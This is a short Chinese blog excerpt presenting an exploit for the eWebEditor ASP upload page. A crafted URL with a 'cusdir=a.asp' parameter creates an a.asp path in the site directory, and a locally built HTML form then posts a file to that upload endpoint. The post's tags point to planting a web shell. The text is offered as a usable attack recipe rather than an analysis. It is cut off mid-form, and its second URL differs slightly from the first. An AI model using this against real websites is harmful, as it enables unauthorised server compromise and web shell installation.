http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
这样会在 网站目录下生产 a.asp这个文件、
然后再本地构造html
<form action=”http://www.xxx.com/admin/ewebeditor/asp/upload.asp?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form&...
shell, 利用, 漏洞阅读全文






最新评论
看看了 貌似很实用